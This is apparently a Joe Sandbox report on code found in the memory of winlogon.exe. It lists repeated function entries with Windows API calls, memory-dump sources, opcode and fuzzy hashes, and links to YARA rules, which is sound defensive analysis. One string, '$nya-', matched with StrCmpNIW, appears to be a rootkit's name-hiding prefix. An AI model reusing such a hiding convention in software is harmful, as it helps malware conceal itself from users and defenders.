API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 2ef598056096b3bfdeabdf0bab39421e006454b166941b32e9cc3945e4c11726
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: AB817133E8034C96FA52AB659481BD97291BFC578CFD4C02DA98947796DB3BC84782C3

Function 000001CA7D1E7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CA7D1E7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001CA7D1E7CCA
_RTC_Initialize.LIBCMT ref: 000001CA7D1E7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CA7D1E7D1E
__scrt_release_startup_lock.LIBCMT ref: 000001CA7D1E7D49

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 160e4b4da880ada073ff2f6592a37a3a82ede2845789ae4f7ceb2b1831bb5f15
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4581E533E8034D46FA53AB659441FE97291BF8578EFC44114A98947796EB3BC846C3C3

Function 000001CA7D299AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B31
GetLastError.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B3F
LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B69
FreeLibrary.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BD7
GetProcAddress.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BE3

Strings

api-ms-, xrefs: 000001CA7D299B51

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 45fd29a1b6800a1b48e2dad99402234d17b04da49f1f4772e7c302736c8b9013
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 1531B073A5270881FE13DB069810BE63398FF88BA9FA915249D1D5A794DA3EC44683C3

Function 000001CA7D219AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B31
GetLastError.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B3F
LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B69
FreeLibrary.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BD7
GetProcAddress.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BE3

Strings

api-ms-, xrefs: 000001CA7D219B51

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 913e52812023985531484c69a56f4c057774ccded8e0e9709dbdd399596a43e9
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 0731A333A5274881FE13DB069800BE53395BF44BA8FA98528AD2946794DE3BD54683C3

Function 000001CA7D1E9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B31
GetLastError.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B3F
LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B69
FreeLibrary.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BD7
GetProcAddress.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BE3

Strings

api-ms-, xrefs: 000001CA7D1E9B51

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: e67ff9930da721277ed07b841fc38b7938dfad7609e3bd6cb6fbc50ffe571c68
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: C331B033A5674881FE139B429800FE53394FF44BA9F990624DD194B794EF3AC4448393

Function 000001CA7D2A3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001CA7D2A3431
GetLastError.KERNEL32 ref: 000001CA7D2A343D
CloseHandle.KERNEL32 ref: 000001CA7D2A3455
CreateFileW.KERNEL32 ref: 000001CA7D2A3480
WriteConsoleW.KERNEL32 ref: 000001CA7D2A349F

Strings

CONOUT$, xrefs: 000001CA7D2A3461

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 629538001b049afcf998d84a33afb03470eae8d162f95f7716f0bf9cb29571b7
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 99119333B54B4482F7528B52E854B5A76A0FBC8BE8F844214EE5D8BB94DF7AC40587C2

Function 000001CA7D223400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001CA7D223431
GetLastError.KERNEL32 ref: 000001CA7D22343D
CloseHandle.KERNEL32 ref: 000001CA7D223455
CreateFileW.KERNEL32 ref: 000001CA7D223480
WriteConsoleW.KERNEL32 ref: 000001CA7D22349F

Strings

CONOUT$, xrefs: 000001CA7D223461

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 8aae48f47a9bb66e9edd86841ba13e019cb2a79eb4afd0458ea2895297c6a3c3
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 8511B132B54B4482F3528B52F854B5976A4FB88BE8F814214EA5D87B94CF3AC50187C6

Function 000001CA7D1F3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001CA7D1F3431
GetLastError.KERNEL32 ref: 000001CA7D1F343D
CloseHandle.KERNEL32 ref: 000001CA7D1F3455
CreateFileW.KERNEL32 ref: 000001CA7D1F3480
WriteConsoleW.KERNEL32 ref: 000001CA7D1F349F

Strings

CONOUT$, xrefs: 000001CA7D1F3461

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 05e9dde98ab0eb027feff401db16e6f2a0fc78696a85aafa316188426943b24b
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: AE119332B50B4482F7528B52E854B9976A0FB88BE8F844214EE5E87B94DF3AC50487C6

Function 000001CA7D296270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D2962AB
GetThreadContext.KERNEL32 ref: 000001CA7D296415

Part of subcall function 000001CA7D2960A0: GetCurrentThreadId.KERNEL32 ref: 000001CA7D2960A4

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 3ffafa6e12e7f3b91adaa85c96a8f4b7dc5847d6796292c8cf60de481045626f
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 21D1EC37644B8C81EA71DB0AE49079A77A0FBC8B89F500112EACD577A5DF3DC542CB86

Function 000001CA7D216270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D2162AB
GetThreadContext.KERNEL32 ref: 000001CA7D216415

Part of subcall function 000001CA7D2160A0: GetCurrentThreadId.KERNEL32 ref: 000001CA7D2160A4

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 813dea70fcca1b133d49793039452a6eb6565c05de3bdde15a2486de481bcc61
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: A1D1CA37644B8C81EA71DB0AE49079E77A0F788B89F504116EACD477A4CF3EC542CB86

Function 000001CA7D292098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D2920A6
TlsFree.KERNEL32 ref: 000001CA7D29225F
TlsFree.KERNEL32 ref: 000001CA7D29226B
TlsFree.KERNEL32 ref: 000001CA7D292277
TlsFree.KERNEL32 ref: 000001CA7D292283
TlsFree.KERNEL32 ref: 000001CA7D29228F

Part of subcall function 000001CA7D295E50: GetCurrentThreadId.KERNEL32 ref: 000001CA7D295E66

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 40abc1d1199b5cdc770a56a60e0e5f4e9b8051ed8e0c54cf7d7e0152ccf3fe8e
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 5651A332A81B4995FE07DB24D850AE933A1FF4474DFC40825A56C163A5EF76C52AC3E3

Function 000001CA7D212098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D2120A6
TlsFree.KERNEL32 ref: 000001CA7D21225F
TlsFree.KERNEL32 ref: 000001CA7D21226B
TlsFree.KERNEL32 ref: 000001CA7D212277
TlsFree.KERNEL32 ref: 000001CA7D212283
TlsFree.KERNEL32 ref: 000001CA7D21228F

Part of subcall function 000001CA7D215E50: GetCurrentThreadId.KERNEL32 ref: 000001CA7D215E66

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 8074ab1debeccdb7de81f9b6b17c497a6e832b8f613fb371d3e6f8c834ae6948
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 7D51C236A91B4995FA07DB28D851AD833A5FF4474CFC08819A52C063A5EF77C51AC3E3

Function 000001CA7D1E2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D1E20A6
TlsFree.KERNEL32 ref: 000001CA7D1E225F
TlsFree.KERNEL32 ref: 000001CA7D1E226B
TlsFree.KERNEL32 ref: 000001CA7D1E2277
TlsFree.KERNEL32 ref: 000001CA7D1E2283
TlsFree.KERNEL32 ref: 000001CA7D1E228F

Part of subcall function 000001CA7D1E5E50: GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E5E66

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: dd7d2fbe355015c765db1afd73c3d8f2591a8a07618d104dc6321a3fb9c50056
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 8751C372A81B4995FB07DB24D860AE433A1BF0474EFC40819A52D467A5FF7AC619C3E3

Function 000001CA7D2935C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D2924D1), ref: 000001CA7D2935EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001CA7D2924D1), ref: 000001CA7D2935FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001CA7D2924D1), ref: 000001CA7D293673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D2924D1), ref: 000001CA7D2936D9
HeapFree.KERNEL32(?,?,?,?,?,000001CA7D2924D1), ref: 000001CA7D2936E7

Strings

$nya-, xrefs: 000001CA7D29366C

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 49d9b1d556f3864c95b1a31ff4b7aec20a143fd073b71ee62d72c1b734a9cc42
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 20319233B45B5996F612DF169540AAA73A0FF84B89F8840208F4857755EF36C4A287C6

Function 000001CA7D2135C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2135EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2135FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D213673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2136D9
HeapFree.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2136E7

Strings

$nya-, xrefs: 000001CA7D21366C

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 1920b0173048c2e31b506ed75283f2b7a4db50c395d0afa64895e5cbc0f95bca
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 6131A233B45B9982F612CF169540BA97391BF44B88F888028DF4807755EF3BD4A283C6

Function 000001CA7D1E35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E36D9
HeapFree.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E36E7

Strings

$nya-, xrefs: 000001CA7D1E366C

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
